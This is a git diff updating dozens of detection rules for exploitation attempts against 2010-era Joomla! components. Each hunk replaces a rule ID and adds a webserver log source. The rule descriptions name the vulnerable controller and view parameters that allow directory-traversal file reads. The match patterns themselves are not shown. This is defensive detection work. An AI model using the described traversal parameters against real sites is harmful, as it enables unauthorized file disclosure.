b/rules/web/web_cve-2010-1472_exploitation_attempt.yml index b85aaaea..7caddd10 100644 --- a/rules/web/web_cve-2010-1472_exploitation_attempt.yml +++ b/rules/web/web_cve-2010-1472_exploitation_attempt.yml @@ -1,5 +1,5 @@ title: CVE-2010-1472 Exploitation Attempt -id: 7472bddd-70cf-409b-8cdd-30c134bcda60 +id: d189b718-577a-4826-ba75-7965be24403f author: Subhash Popuri (@pbssubhash) date: 2021/08/25 status: experimental 
@@ -9,6 +9,8 @@ description: Joomla! Component Horoscope 1.5.0 - Local File Inclusion:Directory
 parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1473_exploitation_attempt.yml b/rules/web/web_cve-2010-1473_exploitation_attempt.yml
index 1c46d760..b48610e1 100644
--- a/rules/web/web_cve-2010-1473_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1473_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1473 Exploitation Attempt
-id: 2be15734-06fe-4383-8ee4-721d4f8b0a70
+id: 51848efa-1963-4f90-b9ca-e614ab66c848
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Advertising 0.25 - Local File Inclusion:Directory
 via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1474_exploitation_attempt.yml b/rules/web/web_cve-2010-1474_exploitation_attempt.yml
index 83bf15da..25da0891 100644
--- a/rules/web/web_cve-2010-1474_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1474_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1474 Exploitation Attempt
-id: b68d5d20-e6ca-425a-9681-93e924c2918b
+id: dcb1e22b-b95e-40b0-a95c-620baf73e56d
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion:Directory
 impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1475_exploitation_attempt.yml b/rules/web/web_cve-2010-1475_exploitation_attempt.yml
index 9806d633..94ed4d8f 100644
--- a/rules/web/web_cve-2010-1475_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1475_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1475 Exploitation Attempt
-id: 11c50fbe-f54a-4c32-a0ae-9d3ab2b0f547
+id: 58505c84-2d43-4686-9fd3-497a7e4f89a3
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inc
 unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1476_exploitation_attempt.yml b/rules/web/web_cve-2010-1476_exploitation_attempt.yml
index fc7dcc00..fb13d546 100644
--- a/rules/web/web_cve-2010-1476_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1476_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1476 Exploitation Attempt
-id: cc5df87f-99ed-486a-8805-d8b97c5bd5bb
+id: a095b6d3-0c40-4719-aa55-01dcb47bc03f
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion:Dire
 other impact via a .. (dot dot) in the view parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1494_exploitation_attempt.yml b/rules/web/web_cve-2010-1494_exploitation_attempt.yml
index e492dff6..2a20d4b9 100644
--- a/rules/web/web_cve-2010-1494_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1494_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1494 Exploitation Attempt
-id: 82fc453a-8032-444e-9801-e6ad7b3e3a9c
+id: 4c7ff51e-47cb-4f89-8a1c-ec71be8d811a
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component AWDwall 1.5.4 - Local File Inclusion:Directory tr
 to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1495_exploitation_attempt.yml b/rules/web/web_cve-2010-1495_exploitation_attempt.yml
index 8b5b8588..2db4bbab 100644
--- a/rules/web/web_cve-2010-1495_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1495_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1495 Exploitation Attempt
-id: eede38ab-67a5-47cd-a0e4-65e82824378d
+id: d87e5c39-a7ed-4f34-8be1-ad1697f3d7d7
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Matamko 1.01 - Local File Inclusion:Directory tra
 to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1532_exploitation_attempt.yml b/rules/web/web_cve-2010-1532_exploitation_attempt.yml
index bd2e252a..a0fc22ad 100644
--- a/rules/web/web_cve-2010-1532_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1532_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1532 Exploitation Attempt
-id: 7185db2e-b76b-4a9f-b157-51a7f799de43
+id: 2abfc7f1-cf26-44c4-a3ff-5033bfe6b855
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion:Direct
 unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1533_exploitation_attempt.yml b/rules/web/web_cve-2010-1533_exploitation_attempt.yml
index 1e779cd7..034bfb71 100644
--- a/rules/web/web_cve-2010-1533_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1533_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1533 Exploitation Attempt
-id: 4f6c4eef-bd44-4d25-8a4a-7f84a1748ec6
+id: a97dbf8e-5234-4821-9033-d1209c55415c
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component TweetLA 1.0.1 - Local File Inclusion:Directory tr
 to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1534_exploitation_attempt.yml b/rules/web/web_cve-2010-1534_exploitation_attempt.yml
index 1649ce5f..ce58f784 100644
--- a/rules/web/web_cve-2010-1534_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1534_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1534 Exploitation Attempt
-id: 25de4419-cce2-4b62-8204-8a4e38114c09
+id: 2a9be005-a6b9-4cdc-aa9e-4d08ba721143
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Shoutbox Pro - Local File Inclusion:Directory tra
 to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1535_exploitation_attempt.yml b/rules/web/web_cve-2010-1535_exploitation_attempt.yml
index ce87bdec..3adce8a2 100644
--- a/rules/web/web_cve-2010-1535_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1535_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1535 Exploitation Attempt
-id: df8fe6a5-b4a6-4d8f-bd32-b6456544d0f8
+id: ce1c278f-5c58-4846-93eb-3fd21ed6b41c
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion:Directory
 via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1601_exploitation_attempt.yml b/rules/web/web_cve-2010-1601_exploitation_attempt.yml
index a715d0fa..208fd52b 100644
--- a/rules/web/web_cve-2010-1601_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1601_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1601 Exploitation Attempt
-id: cfd25065-8f6b-4181-bda1-e3507b51b114
+id: b2dd80fa-e3bf-4321-bc39-c37295d513dd
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -8,6 +8,8 @@ description: Joomla! Component JA Comment - Local File Inclusion:Directory trave
 attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1602_exploitation_attempt.yml b/rules/web/web_cve-2010-1602_exploitation_attempt.yml
index 41d81aec..a41a645d 100644
--- a/rules/web/web_cve-2010-1602_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1602_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1602 Exploitation Attempt
-id: 6a5cc49b-2487-4ec4-8c33-c7d7ba2a3196
+id: f042c30f-ec39-4d1f-bc8b-56c94cd870a7
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion:Directo
 other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1607_exploitation_attempt.yml b/rules/web/web_cve-2010-1607_exploitation_attempt.yml
index f95b2209..6fdab6d4 100644
--- a/rules/web/web_cve-2010-1607_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1607_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1607 Exploitation Attempt
-id: 02ad707d-11d8-4654-93b7-668ee425618c
+id: 699e3765-a82a-4d7c-8214-8e8fe7c57fdd
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component WMI 1.5.0 - Local File Inclusion:Directory traver
 local files via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1657_exploitation_attempt.yml b/rules/web/web_cve-2010-1657_exploitation_attempt.yml
index ee93c1d6..d861dbc2 100644
--- a/rules/web/web_cve-2010-1657_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1657_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1657 Exploitation Attempt
-id: adf6f8fb-fe7f-4dc2-af06-7f8885c5e9e9
+id: e218a3bd-5583-4737-a993-60c14a6839a8
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component SmartSite 1.0.0 - Local File Inclusion:Directory
 to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1659_exploitation_attempt.yml b/rules/web/web_cve-2010-1659_exploitation_attempt.yml
index dd7a2a06..e2208448 100644
--- a/rules/web/web_cve-2010-1659_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1659_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1659 Exploitation Attempt
-id: bad7c462-464c-4471-8b46-309f295c5f09
+id: dde389b6-a56a-48a6-98f6-a58ea7adc0b6
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion:Dir
 in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1714_exploitation_attempt.yml b/rules/web/web_cve-2010-1714_exploitation_attempt.yml
index 6c99e6f8..16d1438a 100644
--- a/rules/web/web_cve-2010-1714_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1714_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1714 Exploitation Attempt
-id: 3d08c7e5-c55f-48e9-90d9-5abfd04e59f0
+id: 52e333b4-a627-44d5-818d-c222c47568e4
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Arcade Games 1.0 - Local File Inclusion:Directory
 to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1717_exploitation_attempt.yml b/rules/web/web_cve-2010-1717_exploitation_attempt.yml
index 20749f73..b0533786 100644
--- a/rules/web/web_cve-2010-1717_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1717_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1717 Exploitation Attempt
-id: d86b7f81-416b-41e1-81d8-d8b0ce291879
+id: 7b5b8495-759b-4ebe-917e-7902579036d9
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component iF surfALERT 1.2 - Local File Inclusion:Directory
 via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1718_exploitation_attempt.yml b/rules/web/web_cve-2010-1718_exploitation_attempt.yml
index c18702c4..67d257ae 100644
--- a/rules/web/web_cve-2010-1718_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1718_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1718 Exploitation Attempt
-id: be0a91f3-44af-423b-ac25-21cac3719194
+id: b263bad9-acf2-45d6-a1e7-bfde91cdcf08
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion:Direc
 local files via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1719_exploitation_attempt.yml b/rules/web/web_cve-2010-1719_exploitation_attempt.yml
index ad0528de..c5589c7f 100644
--- a/rules/web/web_cve-2010-1719_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1719_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1719 Exploitation Attempt
-id: 7e6667ad-773d-430f-803e-b0434e1a18b0
+id: 77d936f8-0b09-4996-bb2e-52893a34f91f
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion:Director
 other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1722_exploitation_attempt.yml b/rules/web/web_cve-2010-1722_exploitation_attempt.yml
index 915152b4..98629be1 100644
--- a/rules/web/web_cve-2010-1722_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1722_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1722 Exploitation Attempt
-id: b6b08f77-dd85-43a1-aba7-2c5019de2cbb
+id: 26b7051c-48b7-4212-ac5e-c8799fe80bdf
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Online Market 2.x - Local File Inclusion:Director
 impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1875_exploitation_attempt.yml b/rules/web/web_cve-2010-1875_exploitation_attempt.yml
index 3327818d..fff7c165 100644
--- a/rules/web/web_cve-2010-1875_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1875_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1875 Exploitation Attempt
-id: dd496a1a-4d1a-466b-961a-c5ec583d9c2a
+id: 28aadbf4-5125-4e7c-9f79-c907363bebd2
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Property - Local File Inclusion:Directory travers
 other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1953_exploitation_attempt.yml b/rules/web/web_cve-2010-1953_exploitation_attempt.yml
index 44324f9c..68fd370b 100644
--- a/rules/web/web_cve-2010-1953_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1953_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1953 Exploitation Attempt
-id: 57d8ec13-203c-41fd-ab1f-1faae9b50704
+id: ebcd435e-0ed6-4d35-b08f-d5a875608f82
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
 the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1954_exploitation_attempt.yml b/rules/web/web_cve-2010-1954_exploitation_attempt.yml
index b8a24efb..1da216a2 100644
--- a/rules/web/web_cve-2010-1954_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1954_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1954 Exploitation Attempt
-id: 75db8c01-6053-40f5-bde9-3eb9b58c6993
+id: 651421c8-279e-4813-954e-64b9d05d1a06
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusio
 (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1955_exploitation_attempt.yml b/rules/web/web_cve-2010-1955_exploitation_attempt.yml
index 5d45ec58..abdda4f9 100644
--- a/rules/web/web_cve-2010-1955_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1955_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1955 Exploitation Attempt
-id: c6c7a6f6-53ae-4dd9-b765-369572746618
+id: ed851f14-5b09-4463-bd9b-75bade8718ff
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion:
 the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1956_exploitation_attempt.yml b/rules/web/web_cve-2010-1956_exploitation_attempt.yml
index be22f9f4..448c125f 100644
--- a/rules/web/web_cve-2010-1956_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1956_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1956 Exploitation Attempt
-id: 45c57364-0925-43c7-8340-2a4a3d57d080
+id: 19d87410-0d59-4176-b0f2-65c2e33c07e7
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion:Direc
 dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1979_exploitation_attempt.yml b/rules/web/web_cve-2010-1979_exploitation_attempt.yml
index 44b2760f..1ecb9b3b 100644
--- a/rules/web/web_cve-2010-1979_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1979_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1979 Exploitation Attempt
-id: 26d368fb-6ba7-42c0-9fdd-cb704c9b5762
+id: 924df1b0-04f2-4e4a-b638-519a6eb3d4e5
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion:Di
 in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1980_exploitation_attempt.yml b/rules/web/web_cve-2010-1980_exploitation_attempt.yml
index 74f85631..c142f120 100644
--- a/rules/web/web_cve-2010-1980_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1980_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1980 Exploitation Attempt
-id: a3003789-08e5-43c3-bf3b-a41498b626be
+id: f6af8453-b1d9-4714-a005-fd231d940855
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion:Directo
 local files via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1981_exploitation_attempt.yml b/rules/web/web_cve-2010-1981_exploitation_attempt.yml
index 61351d14..a66a6582 100644
--- a/rules/web/web_cve-2010-1981_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1981_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1981 Exploitation Attempt
-id: 4819d179-2307-4d81-a96a-a6af63583c90
+id: c0bc20f5-f9f7-4019-83fd-19398acdfb0a
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Fabrik 2.0 - Local File Inclusion:Directory trave
 to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-1983_exploitation_attempt.yml b/rules/web/web_cve-2010-1983_exploitation_attempt.yml
index 89e35f9f..208e28d0 100644
--- a/rules/web/web_cve-2010-1983_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-1983_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-1983 Exploitation Attempt
-id: 34aeb1ba-e6a1-47d8-b705-89f21530c0bc
+id: 113530a7-3288-4f04-887d-127c962e0415
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component redTWITTER 1.0 - Local File Inclusion:Directory t
 the view parameter to index.php
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2033_exploitation_attempt.yml b/rules/web/web_cve-2010-2033_exploitation_attempt.yml
index 4d19b0ba..133697d2 100644
--- a/rules/web/web_cve-2010-2033_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2033_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2033 Exploitation Attempt
-id: 6fe83c91-50fa-4715-abeb-56db4494f0d6
+id: 8081629e-b3a0-4abc-b254-1cdf6cd8f9c8
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla Percha Categories Tree 0.6 - Local File Inclusion:Directory
 other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2034_exploitation_attempt.yml b/rules/web/web_cve-2010-2034_exploitation_attempt.yml
index e4c6c576..55fa1106 100644
--- a/rules/web/web_cve-2010-2034_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2034_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2034 Exploitation Attempt
-id: ac5d3e21-b01f-4bd3-b541-96107ca1a575
+id: af8a99cc-e237-405f-a399-dd3d81109c90
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Percha Image Attach 1.1 - Directory Traversal:Dir
 unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2035_exploitation_attempt.yml b/rules/web/web_cve-2010-2035_exploitation_attempt.yml
index 5dc18fac..ab08ba81 100644
--- a/rules/web/web_cve-2010-2035_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2035_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2035 Exploitation Attempt
-id: a3d33778-c46a-4c7f-93d0-32fa6f44f216
+id: 58483eec-3415-4b3a-958b-5107727a3388
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal:Dir
 unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2036_exploitation_attempt.yml b/rules/web/web_cve-2010-2036_exploitation_attempt.yml
index 213ad9a8..0d46db2a 100644
--- a/rules/web/web_cve-2010-2036_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2036_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2036 Exploitation Attempt
-id: ab306706-061e-418d-bcda-f2350f713aa3
+id: e5fa9960-e1c3-4f95-93c0-66e3c29bd5d8
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal:Di
 unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2122_exploitation_attempt.yml b/rules/web/web_cve-2010-2122_exploitation_attempt.yml
index cbf7c4a1..015f44d8 100644
--- a/rules/web/web_cve-2010-2122_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2122_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2122 Exploitation Attempt
-id: 9c26c662-bd83-453c-bee6-af9ec135f0ed
+id: be413e66-166e-42bb-875d-72552abfe774
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component simpledownload 0.9.5 - Local File Disclosure:Dire
 files via a .. (dot dot) in the controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
diff --git a/rules/web/web_cve-2010-2259_exploitation_attempt.yml b/rules/web/web_cve-2010-2259_exploitation_attempt.yml
index f270d25c..32350c5d 100644
--- a/rules/web/web_cve-2010-2259_exploitation_attempt.yml
+++ b/rules/web/web_cve-2010-2259_exploitation_attempt.yml
@@ -1,5 +1,5 @@
 title: CVE-2010-2259 Exploitation Attempt
-id: 5122163e-68ae-4091-becc-1ce76da87818
+id: c26a4ac4-9dff-47b3-a602-70eb83aad468
 author: Subhash Popuri (@pbssubhash)
 date: 2021/08/25
 status: experimental
@@ -9,6 +9,8 @@ description: Joomla! Component com_bfsurvey - Local File Inclusion:Directory tra
 controller parameter to index.php.
 references:
 - https://github.com/projectdiscovery/nuclei-templates
+logsource:
+ category: webserver
 detection:
 selection:
 c-uri|contains:
